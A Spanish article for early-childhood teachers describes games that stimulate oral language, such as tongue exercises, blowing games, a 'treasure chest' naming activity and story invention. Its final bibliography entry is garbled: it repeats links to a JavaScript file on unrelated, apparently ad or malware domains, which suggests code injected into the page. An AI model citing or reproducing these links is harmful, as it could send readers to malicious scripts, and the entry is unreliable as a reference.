ESTIMULACIÓN DEL LENGUAJE ORAL A TRAVÉS DE LOS JUEGOS

 Autora: María Isabel Gamero Pardo

           El lenguaje es la actividad propia del ser humano con la que nos comunicamos con los demás y nos permite interrelacionar con el mundo que nos rodea.

          Durante la etapa de Educación Infantil el lenguaje evoluciona desde el balbuceo al lenguaje propiamente dicho. Por ello, es importante y recomendable llevar a cabo un Programa de Estimulación del lenguaje oral, tanto por parte de los especialistas de Audición y Lenguaje como de los tutores, siempre con el juego como pilar fundamental.

         En este artículo se exponen algunas actividades que pueden estar presentes en dicho programa. 

           El objetivo principal de cualquier programa de estimulación del lenguaje oral que se lleve a cabo con alumnos en edad infantil es evitar posibles errores articulatorios en etapas posteriores y, en caso de que ya existan, intervenir lo más prontamente posible.

          Las actividades que se realizan van encaminadas a trabajar tres aspectos fundamentales: la articulación, la estimulación auditiva y el ritmo.

          La metodología que se sigue es activa y participativa, destacando el componente lúdico, ya que las actividades que se propongan serán juegos.

          Los momentos de juego son la excusa perfecta para trabajar el lenguaje oral con niños de Educación Infantil, ya que a través del juego también aprenden.

          Entre las actividades que utilizamos en nuestras aulas para estimular el lenguaje oral podemos destacar las siguientes:

 

1.- APRENDEMOS CON LOS JUEGOS:

 -          Juego de escuchar e imitar sonidos del entorno, animales, personas…

-          Enseñarles canciones con gestos y cantarlas juntos. Por ejemplo: “Al coche de mi jefe”.

-          Jugamos con la lengua: nos lamemos los labios después de tomar un helado, sacamos la lengua fuera porque estamos malitos y queremos que el médico nos vea la garganta, llevamos la lengua a un lado del carrillo y hacemos bulto porque estamos comiendo una nuez enorme…

-          Contamos el cuento de “Gusanito y la Señora Lengua”: abrimos bien la boca porque es la puerta de la casa de la señora lengua, llevamos la lengua a un lado fuera de la boca porque la señora lengua mira para un lado, llevamos la lengua al otro lado fuera de la boca porque la señora lengua mira para el otro lado, sacamos la lengua y la levantamos porque la señora lengua mira hacia arriba, sacamos la lengua y la bajamos porque la señora lengua mira hacia abajo, entramos la lengua y cerramos la boca porque la señora lengua cierra la puerta de su casa…

-          Jugamos a “hacer aire frío y aire caliente”.

-          Jugamos a soplar las velas de un cumpleaños, inflar un globo gigante, silbar con un silbato, tocar la trompeta…

-          Jugamos a “si fuéramos…” (granjeros, panaderos, médicos, maestros, cocineros…). Todo lo que se nos ocurra, lo único importante es que los niños tienen que verbalizar lo que hacen.

-          Contamos cuentos con imágenes y le preguntamos sobre el mismo.

-          Podemos conversar sobre cualquier tema que surja en la Asamblea: algún cumpleaños, el nacimiento de algún hermano, alguna actividad señalada…

-          Jugamos a las matemáticas con los animales de la clase: podemos hacer conteos, seriaciones, clasificaciones…

 

2.- ¿QUÉ HAY AHÍ? 

          Tenemos en la clase el “Baúl de los tesoros”, que es una caja que utilizamos durante la Asamblea.

          Dentro del baúl metemos objetos relacionados con la unidad que estemos trabajando. Por ejemplo: En la unidad del colegio podemos meter un lápiz, una goma, una tiza, un babi y un borrador.

          Un niño, que puede ser el Responsable del día, busca y extrae lo que hay en el baúl, va nombrando y diciendo para qué sirve todo lo que saca.

          Cada día se van cambiando los objetos del baúl.

3.- ASOCIACIONES AUDITIVAS 

          Es un juego muy sencillo que les encanta y tiene tantas variantes como queramos:

-          “Un, dos y tres. Dime cosas que empiecen por la letra… e”.

-          “Un, dos y tres. Dime nombres de…”.

-          “Un, dos y tres. Un barco navega y un avión…”.

4.- INVENTAR CUENTOS 

          A los niños les entusiasma escuchar cuentos y también se lo pasan muy bien cuando son ellos los que inventan. Podemos ofrecerle spautas para la invención, por ejemplo: “Vamos a hacer un cuento de un niño y un perro”, o, por el contrario, dejamos que sean ellos los que creen la historia desde el principio.

 

5.- UTILIZAMOS EL MATERIAL “CUENTOS PARA HABLAR” DEL CPR DE ALMENDRALEJO

REFERENCIAS BIBLIOGRÁFICAS: 

  • LEY ORGÁNICA, 2/2006, de 3 de Mayo, de Educación, BOE, número 106 de 4/5/2006, páginas 17158 a 17207
  •  DECRETO 4/2008, de 11 de enero, por el que se aprueba el Currículo de Educación Infantil para la Comunidad Autónoma de Extremadura, DOE, 18 de enero de 2008, núm. 12, p.1226-1272.  
  •  Cpr.almendralejo@edu.juntaextremadura.net.
  • http://middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&www.psicopedagogía.com

Escribe tu opinion

Cuentanos lo que estas pensando ...
y oh, si quieres una imagen para mostrar con su comentario, ve a buscar un gravatar!

Tu debes estar conectado para poder comentar.